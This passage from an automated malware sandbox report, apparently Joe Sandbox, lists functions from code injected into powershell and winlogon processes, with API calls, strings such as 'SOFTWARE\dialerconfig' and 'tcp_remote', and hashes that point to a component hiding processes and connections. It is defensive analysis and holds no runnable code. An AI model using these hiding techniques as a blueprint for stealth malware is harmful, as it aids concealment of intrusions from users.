Opcode ID: 2d7eaf97ccc90420df6056668d0ccdd822ba2c8bb23feb9e3087e9ce3483ee94
Instruction ID: a02a55745e7160683888cff8399c82daa4ab72313aebfbe9638df90908e34b44
Opcode Fuzzy Hash: 2d7eaf97ccc90420df6056668d0ccdd822ba2c8bb23feb9e3087e9ce3483ee94
Instruction Fuzzy Hash: B3F02B3180C6898FDB06DF2898159D97FE0FF56211B0402E7D458C70B2DB66A459C782

Function 00007FF95A604CCA Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.11649541546.00007FF95A600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d94394b23c0cba90b620331d936518d77ac6f979c7e0ce369d9e4703d3c0a7
Instruction ID: de399176101e68a01690bdc534d5f5509339090d8948d5a3321e098aa83244f0
Opcode Fuzzy Hash: 93d94394b23c0cba90b620331d936518d77ac6f979c7e0ce369d9e4703d3c0a7
Instruction Fuzzy Hash: 65F01D31A0D5458FD764EB4CE4856A877E0FF45721B1500F6D24EC7563DA66BC508748

Function 00007FF95A6053E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.11649541546.00007FF95A600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac88666420c9f82497ce58b9045e6db77a466a550d603a4519c7d163b9a4a1b1
Instruction ID: adbaae97a93b6b130bce2465ed0aa0ca36bb2cd4932d21e7907f1205aa78300a
Opcode Fuzzy Hash: ac88666420c9f82497ce58b9045e6db77a466a550d603a4519c7d163b9a4a1b1
Instruction Fuzzy Hash: DCF0A73131CF044FE744EE2CD845765B3D0FBA8310F10462FE44AC3351DA21E4818786

Non-executed Functions

Function 00007FF95A539185 Relevance: 8.0, Strings: 6, Instructions: 462COMMON

Download Yara Rule

Strings

0EyZ, xrefs: 00007FF95A539461
HCyZ, xrefs: 00007FF95A539441
8CyZ, xrefs: 00007FF95A539431
(CyZ, xrefs: 00007FF95A539421
AyZ, xrefs: 00007FF95A5393C1
XDyZ, xrefs: 00007FF95A539451

Memory Dump Source

Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd

Similarity

API ID:
String ID: (CyZ$0EyZ$8CyZ$HCyZ$XDyZ$AyZ
API String ID: 0-2653167220
Opcode ID: 79dcc87cfada842c5a896a50b8ebe7c1c0743aa000a97f18050aca1a95ff6741
Instruction ID: a341a80fde79020721d87952d9a24c498826000edcd45a2fb10d5030480b5143
Opcode Fuzzy Hash: 79dcc87cfada842c5a896a50b8ebe7c1c0743aa000a97f18050aca1a95ff6741
Instruction Fuzzy Hash: 8CF147D3E0E6D25FE7528F6C68A56A93FD4BFA3614B0D00F7D0C9CA093A94A78074359

Function 00007FF95A539390 Relevance: 5.2, Strings: 4, Instructions: 210COMMON

Download Yara Rule

Strings

0EyZ, xrefs: 00007FF95A539461
(CyZ, xrefs: 00007FF95A539421
AyZ, xrefs: 00007FF95A5393C1
XDyZ, xrefs: 00007FF95A539451

Memory Dump Source

Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd

Similarity

API ID:
String ID: (CyZ$0EyZ$XDyZ$AyZ
API String ID: 0-417568979
Opcode ID: 04d8bf25000ca96877c1b439f088e6110670d6d2c3f8f414f50d7bdbd78bbe8c
Instruction ID: e2b647e9d132551b1f8a0e87d75a26a83fc84f2c1c785d380973d2b840cbfaf7
Opcode Fuzzy Hash: 04d8bf25000ca96877c1b439f088e6110670d6d2c3f8f414f50d7bdbd78bbe8c
Instruction Fuzzy Hash: 3F6172E7E0E5C25BE7518F5C78656B96FD0BFE3654B0C01F7C0C9C6097A88A780B429A

Analysis Process: winlogon.exePID: 852, Parent PID: 8464COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	94.5%
Signature Coverage:	0%
Total number of Nodes:	110
Total number of Limit Nodes:	18

Executed Functions

Function 000001F6C88A1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001F6C88A165B
HeapAlloc.KERNEL32 ref: 000001F6C88A166A

Part of subcall function 000001F6C88A1274: GetProcessHeap.KERNEL32 ref: 000001F6C88A127A
Part of subcall function 000001F6C88A1274: HeapAlloc.KERNEL32 ref: 000001F6C88A1289
Part of subcall function 000001F6C88A1274: GetProcessHeap.KERNEL32 ref: 000001F6C88A12A3
Part of subcall function 000001F6C88A1274: HeapAlloc.KERNEL32 ref: 000001F6C88A12B4

RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A16DA
RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A1707
RegCloseKey.ADVAPI32 ref: 000001F6C88A1721
RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A1741
RegCloseKey.ADVAPI32 ref: 000001F6C88A175C
RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A177C
RegCloseKey.ADVAPI32 ref: 000001F6C88A1797
RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A17B7
RegCloseKey.ADVAPI32 ref: 000001F6C88A17D2
RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A17F2
RegCloseKey.ADVAPI32 ref: 000001F6C88A180D
RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A182D
RegCloseKey.ADVAPI32 ref: 000001F6C88A1848
RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A1868
RegCloseKey.ADVAPI32 ref: 000001F6C88A1883
RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A18A3
RegCloseKey.ADVAPI32 ref: 000001F6C88A18BE
RegCloseKey.ADVAPI32 ref: 000001F6C88A18C8

Part of subcall function 000001F6C88A12C8: RegQueryInfoKeyW.ADVAPI32 ref: 000001F6C88A1326
Part of subcall function 000001F6C88A12C8: GetProcessHeap.KERNEL32 ref: 000001F6C88A1334
Part of subcall function 000001F6C88A12C8: HeapAlloc.KERNEL32 ref: 000001F6C88A1345
Part of subcall function 000001F6C88A12C8: RegEnumValueW.ADVAPI32 ref: 000001F6C88A13A1
Part of subcall function 000001F6C88A12C8: GetProcessHeap.KERNEL32 ref: 000001F6C88A13E9
Part of subcall function 000001F6C88A12C8: HeapAlloc.KERNEL32 ref: 000001F6C88A13F7
Part of subcall function 000001F6C88A12C8: GetProcessHeap.KERNEL32 ref: 000001F6C88A141B
Part of subcall function 000001F6C88A12C8: HeapFree.KERNEL32 ref: 000001F6C88A1429
Part of subcall function 000001F6C88A12C8: lstrlenW.KERNEL32 ref: 000001F6C88A1432
Part of subcall function 000001F6C88A12C8: GetProcessHeap.KERNEL32 ref: 000001F6C88A1440
Part of subcall function 000001F6C88A12C8: HeapAlloc.KERNEL32 ref: 000001F6C88A144E

Strings

udp, xrefs: 000001F6C88A189C
startup, xrefs: 000001F6C88A16FD
paths, xrefs: 000001F6C88A17B0
tcp_local, xrefs: 000001F6C88A1826
service_names, xrefs: 000001F6C88A17EB
SOFTWARE\dialerconfig, xrefs: 000001F6C88A16BA
process_names, xrefs: 000001F6C88A1775
tcp_remote, xrefs: 000001F6C88A1861
pid, xrefs: 000001F6C88A173A

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 0be5d788d08d666f523fe049a0fa1f0b9abf75461dfb494b1042db7d0f30801f
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 8871D73A612A5685EB30DF75EC906F927A4FB88BA8F405131DACE57EA8DF38C445C700

Function 000001F6C88A5C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F6C88A5C4B
GetThreadContext.KERNEL32 ref: 000001F6C88A5DB5

Part of subcall function 000001F6C88A5A40: GetCurrentThreadId.KERNEL32 ref: 000001F6C88A5A44

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction ID: 14cad05894704a557f22f57f10d3937e7657795b75d7a9cdddc647a2c4b7120a
Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction Fuzzy Hash: 81D1CF36209B8985DA70DB69E4943AA77A0F3C8B94F100126EACD47FE9DF3DC591CB00

Function 000001F6C88A3878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000001F6C88A3886
GetCurrentProcess.KERNEL32 ref: 000001F6C88A38B4
VirtualProtectEx.KERNEL32 ref: 000001F6C88A38D6
GetCurrentProcess.KERNEL32 ref: 000001F6C88A38F4
VirtualProtectEx.KERNEL32 ref: 000001F6C88A3915

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: ba7ebadacc451a9166115248146817fcb64143ccf44df5bd30920213339611b7
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 56110C3A706B4282EB24DB61F4142F9A6A4FB89BA4F044039DFC947B94EF3DC945C704

Function 000001F6C88A51B0 Relevance: 4.8, APIs: 3, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F6C88A5236

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction ID: 23a021ac7fb55512e573982c7af5fb28fc16e9236576432e410f2a5d543e5080
Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction Fuzzy Hash: B302AA3611AB8186EB60CB65E4943AAB7A0F3C5794F105125EACE87FE9DF7DC484CB00

Function 000001F6C88A3AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001F6C88A3B46
VirtualAlloc.KERNEL32 ref: 000001F6C88A3B80

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: 14604c29ca66876195e9b4b748057f6833472e9913c4133fece4cd02cac232be
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: EE31EC3261AA8682EB70DA35E4543EAA2A5F3887A4F500535F6CD47FE9DF7DC5818B00

Function 000001F6C88A3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001F6C88A347A
PathFindFileNameW.SHLWAPI ref: 000001F6C88A3489

Part of subcall function 000001F6C88A3930: StrCmpNIW.SHLWAPI ref: 000001F6C88A3948

Part of subcall function 000001F6C88A3878: GetModuleHandleW.KERNEL32 ref: 000001F6C88A3886
Part of subcall function 000001F6C88A3878: GetCurrentProcess.KERNEL32 ref: 000001F6C88A38B4
Part of subcall function 000001F6C88A3878: VirtualProtectEx.KERNEL32 ref: 000001F6C88A38D6
Part of subcall function 000001F6C88A3878: GetCurrentProcess.KERNEL32 ref: 000001F6C88A38F4
Part of subcall function 000001F6C88A3878: VirtualProtectEx.KERNEL32 ref: 000001F6C88A3915

CreateThread.KERNEL32 ref: 000001F6C88A34D7

Part of subcall function 000001F6C88A1EB4: GetCurrentThread.KERNEL32 ref: 000001F6C88A1EBF

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: a6bda54fd4cde59eb3defc92972b87cc2a728c7c335a6204337d58bbc06204bf
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: FE11577062760382FB71E771A8063F92290EBA4B24F5400399BC687DD4EF79C4888350

Function 000001F6C88A4ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001F6C88A4ED4
VirtualProtect.KERNEL32 ref: 000001F6C88A4F17
FlushInstructionCache.KERNEL32 ref: 000001F6C88A4F2C

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction ID: 4cd72e48f6a02dd57c329797b3560a18a91101cda2c11f91feb9cb50431cceb9
Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction Fuzzy Hash: AAF0B73621AA4581DA30EB25E4517EAA7A0E3C87F4F141125FACD07FE9DE39C2908B00

Function 000001F6C8472908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001F6C84729AA
LoadLibraryA.KERNELBASE ref: 000001F6C8472A31

Memory Dump Source

Source File: 00000018.00000002.12785446873.000001F6C8470000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8470000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8470000_winlogon.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 7968349ee8d14acd218f03b9e52b4c43487f15eec3f3bf0d1e51d22d55287b6f
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 3661BD7270166287EA78CF2A94807B9B391FB54BA4F54C139DBDA07785DF38E852C700

Function 000001F6C88A1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001F6C88A1650: GetProcessHeap.KERNEL32 ref: 000001F6C88A165B
Part of subcall function 000001F6C88A1650: HeapAlloc.KERNEL32 ref: 000001F6C88A166A
Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A16DA
Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A1707
Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A1721
Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A1741
Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A175C
Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A177C
Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A1797
Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A17B7
Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A17D2
Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A17F2

Sleep.KERNEL32 ref: 000001F6C88A1C43
SleepEx.KERNELBASE ref: 000001F6C88A1C49

Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A180D
Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A182D
Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A1848
Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A1868
Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A1883
Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A18A3
Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A18BE
Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A18C8

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 11655bc69b073d59b314373f83a9bea2d0dfd2b522bb48740e46c9768987d993
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 8D31787D212A0391FB74DB36DA513FA52A5AB84BE5F145031DECB87ED7EE28C8608250

Function 000001F6C88A3930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000001F6C88A3948

Strings

dialer, xrefs: 000001F6C88A3941

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 07dc30d4aa9ba2fd93085fbae647fe776ec9f6c05cca99c520f775f8bde79021
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: B3D0173031220B86FB34DBB188912F02250EB45724F489030CA8102994D7198D8D8710

Function 000001F6C88D2908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001F6C88D29AA

Memory Dump Source

Source File: 00000018.00000002.12790483365.000001F6C88D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F6C88D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88d0000_winlogon.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: c1738a26b98df9f30bfd0c631a3a9452fa9da9fa5f15d235e032fcd5a5cfc14b
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 6661AA7270265387EA78DF2995407BDB391FB44BA4F54812BDED907B85DB38E852C700

Function 000001F6C890AE0C Relevance: 1.3, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 000001F6C890AE4A

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
Instruction ID: 51b7856f3508d0c3cb27926d78de88f56f6e6cb6d64577db43eb5a80a250bb7b
Opcode Fuzzy Hash: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
Instruction Fuzzy Hash: 5EF0153170528B49FA74EBBA69053FDA1C05B8CBB2F084A316DEA866C3DB2CC4519290

Non-executed Functions

Function 000001F6C8902CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001F6C8902D80
lstrlenW.KERNEL32 ref: 000001F6C8902FBA

Part of subcall function 000001F6C8901A14: OpenProcess.KERNEL32 ref: 000001F6C8901A3A
Part of subcall function 000001F6C8901A14: K32GetModuleFileNameExW.KERNEL32 ref: 000001F6C8901A58
Part of subcall function 000001F6C8901A14: PathFindFileNameW.SHLWAPI ref: 000001F6C8901A67
Part of subcall function 000001F6C8901A14: lstrlenW.KERNEL32 ref: 000001F6C8901A73
Part of subcall function 000001F6C8901A14: StrCpyW.SHLWAPI ref: 000001F6C8901A86
Part of subcall function 000001F6C8901A14: CloseHandle.KERNEL32 ref: 000001F6C8901A94

GetProcAddress.KERNEL32 ref: 000001F6C8902D95

Part of subcall function 000001F6C8901554: StrCmpIW.SHLWAPI ref: 000001F6C8901585

Part of subcall function 000001F6C8903930: StrCmpNIW.SHLWAPI ref: 000001F6C8903948

StrCmpNIW.SHLWAPI ref: 000001F6C8902DD8
lstrlenW.KERNEL32 ref: 000001F6C8902F00

Strings

ntdll.dll, xrefs: 000001F6C8902D79
NtQueryObject, xrefs: 000001F6C8902D8B
\Device\Nsi, xrefs: 000001F6C8902DCB

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 61a6284086d29bc91aece22bca5f142c4ebadfb8cabddd7c3e08e2c8f08fe71a
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 65B17D72211A9281EB75CF79D4407F9A3A4FB48BA6F54503AEECA53796DB35CC80C340

Function 000001F6C88A2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001F6C88A2D80
lstrlenW.KERNEL32 ref: 000001F6C88A2FBA

Part of subcall function 000001F6C88A1A14: OpenProcess.KERNEL32 ref: 000001F6C88A1A3A
Part of subcall function 000001F6C88A1A14: K32GetModuleFileNameExW.KERNEL32 ref: 000001F6C88A1A58
Part of subcall function 000001F6C88A1A14: PathFindFileNameW.SHLWAPI ref: 000001F6C88A1A67
Part of subcall function 000001F6C88A1A14: lstrlenW.KERNEL32 ref: 000001F6C88A1A73
Part of subcall function 000001F6C88A1A14: StrCpyW.SHLWAPI ref: 000001F6C88A1A86
Part of subcall function 000001F6C88A1A14: CloseHandle.KERNEL32 ref: 000001F6C88A1A94

GetProcAddress.KERNEL32 ref: 000001F6C88A2D95

Part of subcall function 000001F6C88A1554: StrCmpIW.SHLWAPI ref: 000001F6C88A1585

Part of subcall function 000001F6C88A3930: StrCmpNIW.SHLWAPI ref: 000001F6C88A3948

StrCmpNIW.SHLWAPI ref: 000001F6C88A2DD8
lstrlenW.KERNEL32 ref: 000001F6C88A2F00

Strings

ntdll.dll, xrefs: 000001F6C88A2D79
NtQueryObject, xrefs: 000001F6C88A2D8B
\Device\Nsi, xrefs: 000001F6C88A2DCB

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 042ae2964a89d9f9d2caf1ab4c60366dd6a67adbe8110dc3c7066958067e7d98
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 91B15A72222A5286EB78CF75D4507F9A3A4FB84BA4F54502AEEC953FD9DB35C880C340

Function 000001F6C8907E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001F6C8907E8C
RtlCaptureContext.NTDLL ref: 000001F6C8907EB9
RtlLookupFunctionEntry.NTDLL ref: 000001F6C8907ED3
RtlVirtualUnwind.NTDLL ref: 000001F6C8907F14
IsDebuggerPresent.KERNEL32 ref: 000001F6C8907F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F6C8907F89
UnhandledExceptionFilter.KERNEL32 ref: 000001F6C8907F94

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: cb427cba997a5a879f1a84418dee62e2220008056d564a7eee05c2057aff6548
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: C7313A72205A8196EB70DF74E8403ED77A4F789765F44442ADACE47B99EF38C548C710

Function 000001F6C88A7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001F6C88A7E8C
RtlCaptureContext.NTDLL ref: 000001F6C88A7EB9
RtlLookupFunctionEntry.NTDLL ref: 000001F6C88A7ED3
RtlVirtualUnwind.NTDLL ref: 000001F6C88A7F14
IsDebuggerPresent.KERNEL32 ref: 000001F6C88A7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F6C88A7F89
